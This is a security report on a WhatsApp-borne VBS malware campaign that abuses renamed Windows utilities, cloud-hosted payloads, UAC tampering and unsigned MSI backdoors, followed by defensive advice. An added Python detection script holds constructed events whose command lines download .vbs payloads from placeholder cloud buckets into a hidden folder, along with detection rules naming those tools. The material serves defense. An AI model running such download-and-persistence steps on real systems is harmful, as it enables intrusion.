A new malware campaign abuses WhatsApp messages to deliver malicious Visual Basic Script (VBS) files to Windows users, ultimately enabling persistent remote access through unsigned MSI installers.
Microsoft Defender Experts observed the campaign beginning in late February 2026, using WhatsApp messages to deliver the malicious VBS files.
The attackers aim to establish persistence and escalate privileges, ultimately installing malicious MSI packages on victim systems.
The campaign starts with WhatsApp messages carrying VBS attachments that appear benign but execute as scripts when opened on Windows.
Once launched, the initial script creates hidden folders under C:\ProgramData and copies legitimate Windows tools, such as curl.exe and bitsadmin.exe, into these locations, renaming them to misleading filenames such as netapi.dll and sc.exe.
Although the filenames change, the binaries retain their original PE metadata, including the OriginalFileName field, which still identifies them as curl.exe and bitsadmin.exe.
This mismatch between the on-disk name and the embedded metadata provides a practical detection hook for security products that inspect PE headers.

In environments where such inspection is limited, defenders must instead monitor command-line arguments and network telemetry associated with these utilities to identify abuse.
WhatsApp Attack Chain
Using the renamed tools, the malware retrieves secondary VBS payloads such as auxs.vbs, 2009.vbs, and WinUpdate_KB5034231.vbs from trusted cloud infrastructure including AWS S3, Tencent Cloud, and Backblaze B2.
By tunneling malicious downloads through widely used cloud platforms, the operators make their traffic resemble ordinary enterprise activity and complicate simple domain- or IP-based blocking.
This stage reflects a broader trend in which attackers weaponize legitimate cloud services to host droppers and command-and-control resources, betting that organizations are reluctant to filter business-critical platforms aggressively.
The reliance on living-off-the-land binaries (LOLBins) and reputable providers significantly lowers the behavioral profile of the attack, especially in environments that focus primarily on unknown binaries or obvious malware families.
After establishing a foothold, the secondary scripts begin tampering with User Account Control (UAC) and registry settings to secure elevated privileges and persistence.

The malware repeatedly attempts to launch cmd.exe with administrative rights and modifies registry keys under HKLM\Software\Microsoft\Win, including ConsentPromptBehaviorAdmin, to suppress UAC prompts and allow silent elevation.
By combining registry manipulation with UAC bypass techniques, the attackers aim to maintain long-term administrative access that survives reboots and resists routine cleanup efforts.
These actions are detectable as repeated UAC-related registry changes and unusual elevated command shells spawned from script hosts or renamed Windows utilities.
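The telemetry-side detections the two sections above call for (script hosts spawning renamed download utilities, .vbs payloads fetched from cloud object storage into ProgramData, and repeated UAC-related registry changes), as an added example that is not code from the original report or from Microsoft. The events are constructed Sysmon-style records with assumed field names (Image, OriginalFileName, ParentImage, CommandLine, IntegrityLevel, TargetObject); the provider domains amazonaws.com, myqcloud.com and backblazeb2.com are the general storage domains of the three providers named in the report, not indicators from the campaign; the hidden folder C:\ProgramData\.cache and the full registry path to ConsentPromptBehaviorAdmin are assumptions; EnableLUA is another well-known UAC value the report does not mention.

```python
"""Detection logic for the behaviours described in the report, run over
constructed process-creation and registry events.

Added example, not from the original report. Field names follow Sysmon
conventions but are assumed; every event below is constructed."""
import re
from typing import Dict, List

DOWNLOAD_TOOLS = {"curl.exe", "bitsadmin.exe"}           # named in the report
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}  # named in the report
UAC_VALUES = {"consentpromptbehavioradmin", "enablelua"}  # second one assumed extra
# Assumed general storage domains of the providers the report names.
CLOUD_STORAGE = re.compile(
    r"https?://[^\s\"']*(amazonaws\.com|myqcloud\.com|backblazeb2\.com)", re.I)


def _base(path: str) -> str:
    """Last path component, lower-cased (works for file and registry paths)."""
    return path.rsplit("\\", 1)[-1].lower()


def analyse_process(ev: Dict[str, str]) -> List[str]:
    """Rules for a process-creation event; returns zero or more alert tags."""
    hits: List[str] = []
    image = _base(ev["Image"])
    orig = ev.get("OriginalFileName", "").lower()
    parent = _base(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    # Renamed LOLBin: metadata says curl/bitsadmin, disk name says otherwise.
    if orig in DOWNLOAD_TOOLS and image != orig:
        hits.append(f"renamed-lolbin: {image} is really {orig}")
    # Script host driving a download utility.
    if parent in SCRIPT_HOSTS and orig in DOWNLOAD_TOOLS:
        hits.append(f"script-host-download: {parent} spawned {orig}")
    # Script payload pulled from cloud object storage.
    m = CLOUD_STORAGE.search(cmd)
    if m and re.search(r"\.vbs\b", cmd, re.I):
        hits.append(f"cloud-hosted-script: fetch from {m.group(1).lower()}")
    # Download utility writing into ProgramData.
    if orig in DOWNLOAD_TOOLS and "programdata" in cmd.lower():
        hits.append("download-to-programdata")
    # Elevated command shell spawned from a script host.
    if parent in SCRIPT_HOSTS and image == "cmd.exe" \
            and ev.get("IntegrityLevel", "").lower() == "high":
        hits.append(f"elevated-shell-from-script-host: {parent} -> cmd.exe")
    return hits


def analyse_registry(ev: Dict[str, str]) -> List[str]:
    """Rules for a registry value-set event."""
    value = _base(ev["TargetObject"])
    return [f"uac-tamper: {value}"] if value in UAC_VALUES else []


def detect(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Map each host to its alerts; the second UAC change on one host adds
    an escalation tag, matching the 'repeated tampering' indicator."""
    alerts: Dict[str, List[str]] = {}
    uac_count: Dict[str, int] = {}
    for ev in events:
        host = ev["host"]
        if ev["type"] == "process":
            hits = analyse_process(ev)
        else:
            hits = analyse_registry(ev)
            if hits:
                uac_count[host] = uac_count.get(host, 0) + 1
                if uac_count[host] == 2:
                    hits.append("repeated-uac-tamper: escalate")
        if hits:
            alerts.setdefault(host, []).extend(hits)
    return alerts


# Constructed events: one infected host (WS-01) and one benign curl use (WS-02).
_SYS = r"C:\Windows\System32"
_UAC_KEY = r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"  # assumed full path
EVENTS: List[Dict[str, str]] = [
    {"type": "process", "host": "WS-01", "Image": _SYS + r"\wscript.exe",
     "OriginalFileName": "wscript.exe", "ParentImage": r"C:\Apps\WhatsApp.exe",
     "CommandLine": r'wscript.exe "C:\Users\u\Downloads\invoice.vbs"'},
    {"type": "process", "host": "WS-01", "Image": r"C:\ProgramData\.cache\netapi.dll",
     "OriginalFileName": "curl.exe", "ParentImage": _SYS + r"\wscript.exe",
     "CommandLine": r"netapi.dll -s -o C:\ProgramData\.cache\auxs.vbs https://bucket.s3.amazonaws.com/auxs.vbs"},
    {"type": "process", "host": "WS-01", "Image": r"C:\ProgramData\.cache\sc.exe",
     "OriginalFileName": "bitsadmin.exe", "ParentImage": _SYS + r"\wscript.exe",
     "CommandLine": r"sc.exe /transfer j /download https://f000.backblazeb2.com/x/2009.vbs C:\ProgramData\.cache\2009.vbs"},
    {"type": "process", "host": "WS-01", "Image": _SYS + r"\cmd.exe",
     "OriginalFileName": "cmd.exe", "ParentImage": _SYS + r"\wscript.exe",
     "IntegrityLevel": "High", "CommandLine": r"cmd.exe /c reg add ..."},
    {"type": "registry", "host": "WS-01", "Image": _SYS + r"\reg.exe",
     "TargetObject": _UAC_KEY + r"\ConsentPromptBehaviorAdmin", "Details": "DWORD (0x00000000)"},
    {"type": "registry", "host": "WS-01", "Image": _SYS + r"\reg.exe",
     "TargetObject": _UAC_KEY + r"\ConsentPromptBehaviorAdmin", "Details": "DWORD (0x00000000)"},
    {"type": "process", "host": "WS-02", "Image": _SYS + r"\curl.exe",
     "OriginalFileName": "curl.exe", "ParentImage": _SYS + r"\cmd.exe",
     "CommandLine": r"curl.exe -O https://example.com/readme.txt"},
]

if __name__ == "__main__":
    for host, tags in detect(EVENTS).items():
        print(host, *tags, sep="\n  ")
```

The rules key on OriginalFileName rather than the image path precisely because the report notes the metadata survives renaming; the benign WS-02 event shows that an unrenamed curl.exe fetching a non-script file from an unlisted host raises nothing, which keeps the renamed-utility and cloud-script signals usable as high-confidence alerts rather than noise.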
Unsigned MSI backdoors
In the final stage, the campaign deploys unsigned MSI installers with names such as Setup.msi, WinRAR.msi, LinkPoint.msi, and AnyDesk.msi to mimic common enterprise software.
The absence of trusted publisher signatures is a strong indicator of malicious intent, given that legitimate installers for these tools are normally signed.
Once installed, remote-access solutions like AnyDesk give the threat actors persistent interactive control over compromised hosts, enabling data theft, further malware deployment, or lateral movement.
Because MSI-based deployment is common in managed environments, these backdoors can easily blend into standard software rollout activities if code-signing and reputation checks are not enforced.
Microsoft recommends hardening endpoints by restricting or blocking script hosts (wscript, cscript, mshta) in untrusted locations and monitoring for renamed or hidden Windows utilities executed with atypical flags.
Enabling cloud-delivered protection, EDR in block mode, attack surface reduction rules for obfuscated or script-launched executables, and tamper protection in Microsoft Defender can significantly reduce the success of similar living-off-the-land campaigns.
Organizations should enhance inspection of traffic to Tencent Cloud and Backblaze B2, looking for suspicious download patterns rather than relying solely on destination reputation.
Defenders are urged to track registry changes under HKLM\Software\Microsoft\Win and detect repeated UAC tampering as potential compromise indicators, while also blocking known command-and-control endpoints where intelligence is available.